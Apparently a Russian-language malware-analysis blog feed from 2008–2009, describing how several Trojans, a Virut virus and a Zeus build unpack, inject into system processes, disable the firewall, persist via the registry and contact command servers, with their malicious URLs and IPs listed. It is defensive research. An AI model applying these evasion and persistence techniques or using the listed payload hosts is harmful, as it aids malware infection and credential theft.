Кроме того, программа скачивает и запускает файл http://trafficmonsterinc.ru/grabber.exe . Скачиваемая программа (704 Кб) оказалась программой сбора паролей от огромного количества программ – SpotAuditor v3.7.7 (http://spotauditor.nsauditor.com)

2009, GMax
e_gmax@mail.ru

Trojan.Win32.Agent.bryp

noreply@blogger.com (GMax) — Tue, 24 Feb 2009 17:41:00 +0000

Имя файла: 111.exe
Размер: 22,1 Кб
Time/Date Stamp (GMT): 5 февраля 2009 г. 14:54:12
http://www.virustotal.com/ru/analisis/1f7b296f89914c531ffcb6c9e10df59b
Файл не чем не запакован, написан на Visual C++ 6.0. Зачем-то читает в ветке реестра "Software\Microsoft\Windows\CurrentVersion\ShellBotR" ключ “Infected”. Далее извлекает и расшифровывает из себя два других исполняемых файла: имя первого генерируется случайно (12177.exe), имя второго “пустышка.exe”, сохраняет их в папку Temp и запускает на исполнение. Как и следует из имени, второй файла ничего не делает кроме вызова функции ExitProcess (размер файла 1,5 Кб).
Имя файла: 12177.exe
Размер: 15 Кб
Time/Date Stamp (GMT): 3 февраля 2009 г. 12:39:13
http://www.virustotal.com/ru/analisis/9602874fe625c156ae5b21ac5fa95472
Файл разбавлен мусором. Вначале расшифровывается основное тело программы (ADVAPI32.CryptDecrypt).
Далее инициализируется импорт, расшифровывается нужные строки. Расшифровывается и сохраняется в папку System32 библиотека “Px.ax”. Затем троян читает kernel32.dll, производит модификацию функции CreateProcessW, добавляя загрузку библиотеки “Px.ax”. Оригинальная библиотека "\system32\dllcache\kernel32.dll" переименовывается в "kbdpx.dll", а на ее место записывается модифицированный вариант. При записи новых файлов время создания и модификации устанавливается такое же как и у файла “kernel32.dll”.
В цикле 380 раз проходит по списку запущенных процессов, ищет процесс "taskmgr.exe" (Диспетчер процессов), в случаи, если процесс запущен, останавливает все его потоки. Далее еще один цикл с поиском процессов "explorer.exe" и "taskmgr.exe" и остановкой их потоков. Результатом остановки потоков процесса "explorer.exe" будет “зависание” системы, а далее, скорее всего перезагрузка системы.
Имя файла: Px.ax
Размер: 12,5 Кб
Time/Date Stamp (GMT): 3 февраля 2009 г. 12:37:21
http://www.virustotal.com/ru/analisis/fe89654a85028db84064ae58d49c31f2
Не чем не упакованная DLL. Инжектится к процессу "svchost.exe" с помощью функции CreateRemoteThread. При работе создает мютекс "Global\\Px.Ax". Скачивает файл: http://trafficmonsterinc.ru/bot.dll. Большая часть кода DLL не работает. Есть зашифрованные строки для отключения встроенного фаервола, установки в автозагрузку, URL и т.д., но все это не используется.
2009, GMax
e_gmax@mail.ru

Virus.Win32.Virut.ce

noreply@blogger.com (GMax) — Fri, 06 Feb 2009 18:25:00 +0000

Имя файла: tcflash.exe
Размер: 30,5 Кб
Time/Date Stamp (GMT): 24 сентября 2007 г. 13:42:46
http://www.virustotal.com/ru/analisis/77f189044d56330a199c4b20eb25f161
Файл заражен путем расширения последний секции. Переход на добавленный код осуществляется не сразу на точке входа, а спустя некоторое число команд. Код разбавлен мусором и зашифрован. После расшифровки программа ищет базу kernall32.dll затем, по заданным хешам, ищутся нужные API функции. После этого перебираются процессы в системе, пропуская четыре первых и попадая на процесс winlogon.exe, далее производится инжект с помощью CreateRemoteThread. А вот сам код попадает в процесс winlogon.exe с помощью мэпирования секции (ZwMapViewOfSection). Далее программа копирует в процесс адреса нужных API функций.
В инжектированном коде открывается файл “Windows\System32\Drivers\ETS\HOST” и записывается туда строка “127.0.0.1 ZieF.pl”. Прописывает процесс winlogon.exe в исключения внутреннего брандмауэра. Командный центр находится по адресу http://ZieF.pl/, по адресу http://ZieF.pl/rc/ можно скачать PDF эксплоит.
Управление осуществляется по IRC.
2009, GMax
e_gmax@mail.ru

Email-Worm.Win32.Agent.gfs

noreply@blogger.com (GMax) — Sun, 01 Feb 2009 15:49:00 +0000

Имя файла: BD.exe
Размер: 63,5 Кб
Time/Date Stamp (GMT): 22 января 2009 г. 7:45:15
http://www.virustotal.com/ru/analisis/ce2cd829662982f3271a8c43f86cc2b8
Файл не чем не запакован, нет никаких препятствующих техник. После стандартной процедуры инициализации импорта, троян создает для работы несколько мютексов с помощью которых осуществляется управление потоками трояна. Далее запускает четыре потока, которые занимаются пересылкой шифрованной информации и рассылкой на указанные адреса спама. Адрес командного центра 94.75.209.4 (hosted-by.leaseweb.com).
В коде присутствуют строки,
поискав в Интернете можно найти довольно подробные описания трояна Trojan.Kobcka.
2009, GMax
e_gmax@mail.ru

Trojan-Downloader.Win32.Agent.belq

noreply@blogger.com (GMax) — Wed, 28 Jan 2009 17:18:00 +0000

Имя файла: file.exe
Размер: 9,98 Кб
Time/Date Stamp (GMT): 21 января 2009 г. 10:19:48
http://www.virustotal.com/ru/analisis/2a545fef44918ac8f0d982dd25d478e8
Программа обильно разбавлена мусорным кодом. В начале инициализируется импорт предварительно расшифрованными (xor) строками. Далее расшифровывается основная часть программы, выполненная в виде отдельной библиотеки, копируется в специально выделенный участок памяти, производится инициализация и запускается на выполнение.
Размер: ~16 Кб
Time/Date Stamp (GMT): 14 декабря 2008 г. 21:56:31
http://www.virustotal.com/ru/analisis/2f3628dab95e4aa13a6797cdd8506ec3
После инициализации импорта проверяется наличие в системе сервиса ndis_ver2, в случаи, если сервис найден, файл самоудаляется. Отключается встроенный фаервол Windows. Копирует себя в USERPROFILE каталог, делает файл скрытым, ставит себя в автозагрузку в реестре “Software\Microsoft\Windows\CurrentVersion\Run”. Перебирает все процессы в системе и делает инжект своего кода. На основе уникальных данных машины (в том числе и S.M.A.R.T.), составляется идентификационная строка для данного компьютера. Далее бот передает эту строку на один из своих командных центров, программой предусмотрено наличие множества C&C, которые перебираются на доступность один раз в 20 секунд, кроме того адреса хранятся не в виде строк, а в числовом виде. В данном экземпляре предусмотрено два адреса: 69.147.239.106 и 94.103.4.217.Далее бот скачивает с командного центра файл и либо сохраняет его на диск в папку TEMP под именем (первые две буквы BN затем цифры) и запускает на исполнение, либо создает зомби процесс svchost.exe копирует в память скаченный файл и запускает.
2009, GMax
e_gmax@mail.ru

Trojan-Spy.Win32.Zbot

noreply@blogger.com (GMax) — Wed, 14 Jan 2009 16:29:00 +0000

Имя файла: ntos.exe
Размер: 217 Кб
http://www.virustotal.com/ru/analisis/f1623f018c7827fe11eca39e0477275a
Размер файла искусственно увеличен ненужным мусором, истинный размер 41 Кб.
С начала расшифровывается (xor 52h) небольшой кусочек кода, далее еще один (xor 7Ah), затем еще один цикл расшифровки. Далее три зашифрованные секции поочередно расшифровывается с копированием содержимого в другие секции. После вот таких “хитроумных” манипуляций мы попадаем на OEP. Как и утверждают, большинство AV программа оказалась трояном Zeus, функции которой давно описаны, а билдер и админка легко доступны в сети. Ключевые действия это инжект в winlogon.exe, перехват трафика, подмена выбранных сайтов, кража паролей, умеет делать скриншоты, крадет сертификаты и еще кое-что по мелочи. Данный билд был настроен на адрес: http://hopana.info/web/cfg.binИнтересно, что билдер (Control Panel) производит не совсем стандартные действия: поиск бота в системе, предоставляет информацию о версии трояна и самое интересно производит деинсталляцию.2009, GMax
e_gmax@mail.ru

Trojan-Downloader.Win32.Agent.apoa

noreply@blogger.com (GMax) — Mon, 29 Dec 2008 16:40:00 +0000

Имя файла: nvsyst32.exe
Размер: 3,22 Кб
http://www.virustotal.com/ru/analisis/e00e1131bbac6845be88b917ce04e6ab
Файл упакован WinUpack. При старте проверяет командную строку, если нет команды START, то перезапускает себя с этой командой. Далее находит адреса функций IcmpSendEcho и IcmpCreateFile. После этого ставит себя в автозагрузку. Затем определяет доступен ли Интернет, по адресам www.google.com, www.microsoft.com, www.yahoo.com. Если хоть один из них доступен, расшифровывает с помощью побайтового xor адреса своих командных центров:
http://goffhouseinn.com/tmp/.images/data.php,
http://sexygaby.com/cache/.images/data.php,
http://nimbarka.com/tmp/.images/data.php
Командный центр отвечает по одному из 4 заложенных в программу сценариев. Три первых это DDOS какого-либо сайта, в первом случаи просто запрос по TCP c валидными параметрами, во втором это UDP запрос, в третьем это ping (ICMP запрос). Четвертый вариант задания это скачивание и запуск программы.
2008, GMax
e_gmax@mail.ru

Trojan.MulDrop

noreply@blogger.com (GMax) — Fri, 26 Dec 2008 17:46:00 +0000

Имя файла: update.exe
Размер: 91 Кб
Time/Date Stamp (GMT): 25 декабря 2008 г. 20:52:13
http://www.virustotal.com/ru/analisis/0e01b13d625121736f629f2191b07446
Первый слой представляет собой просто расшифровку основного тела программы с помощью пайпа (Pipe). Для получения нужных API функций используется оригинальный метод расшифровки строк (побуквенное копирование в локальный буфер с последующей расшифровкой, при таком подходе строки не хранятся в секции данных).Хоть расшифрованная часть программы и является самостоятельным exe файлом (размером 82,5 Кб), файл не сохранятся на диск с последующим запуском, а настраивается и запускается самой программой установщиком.
http://www.virustotal.com/ru/analisis/1d10486223a29f2b635907ea8a8a7f3a
При дальнейшем рассмотрении оказалось, что расшифрованная программа представляет собой обертку для установки еще двух программ (0.EXE, 1.EXE), которые хранятся в ресурсах программы. Обе копируются в директорию TEMP и запускаются на выполнение. Хотя нечего более программа не делает, в коде полно стандартных библиотечных функций Delphi, которые не используются.
Имя файла: 0.EXE
Размер: 43,5 Кб
Time/Date Stamp (GMT): 25 декабря 2008 г. 19:07:49
http://www.virustotal.com/ru/analisis/3e3c8aa4f52f4ee6cd06e16301ff9b28
Здесь применятся тот же “криптор”, что и в основной программе (расшифровка строк, инициализация импорта, расшифровка с помощью пайпов, запуск из памяти).
Размер: 36,9 Кб
Time/Date Stamp (GMT): 25 декабря 2008 г. 19:06:11
http://www.virustotal.com/ru/analisis/5ec71ddbf47b3e00166f824a7618a788 Вначале расшифровываются имена функций и необходимые строки, затем находятся адреса API функций. С помощью bat файлов отключается встроенный брандмауэр Windows. Программа записывается в автозагрузку (“Software\Microsoft\Windows\CurrentVersion\run”), разрешает себе доступ в Интернет и каждые 5 секунд повторяет эти действия. В целом это Trojan.Spambot версии v508. Далее из секции данных расшифровывается очередная часть трояна, на этот раз это DLL. Библиотека загружается в память и вызывается экспортируемая функция load.
Размер расшифрованной библиотеки: 25,5 Кб.
Time/Date Stamp (GMT): 9 октября 2006 г. 21:32:06
http://www.virustotal.com/ru/analisis/5179d521778c3f776476634a038879d4
Библиотека полностью идентична той что была в Trojan.Spambot, включая адрес откуда берется спам 66.232.109.178.
Имя файла: 1.EXE
Размер: 24,5 Кб
Time/Date Stamp (GMT): 8 сентября 2008 г. 17:03:35
http://www.virustotal.com/ru/analisis/4681e13e0223e093e5be3f2d7050bc85
Файл сжат UPX. Размер после распаковки ~80 Кб. Код очень богат разнообразными экзотическими инструкциями. Первым делом инициализируется импорт. Затем запускается процесс svchost.exe в остановленном состоянии, копирует туда себя, меняет контекст процесса, и запускает. C&C на сайте tailormadeservers.com
2008, GMax
e_gmax@mail.ru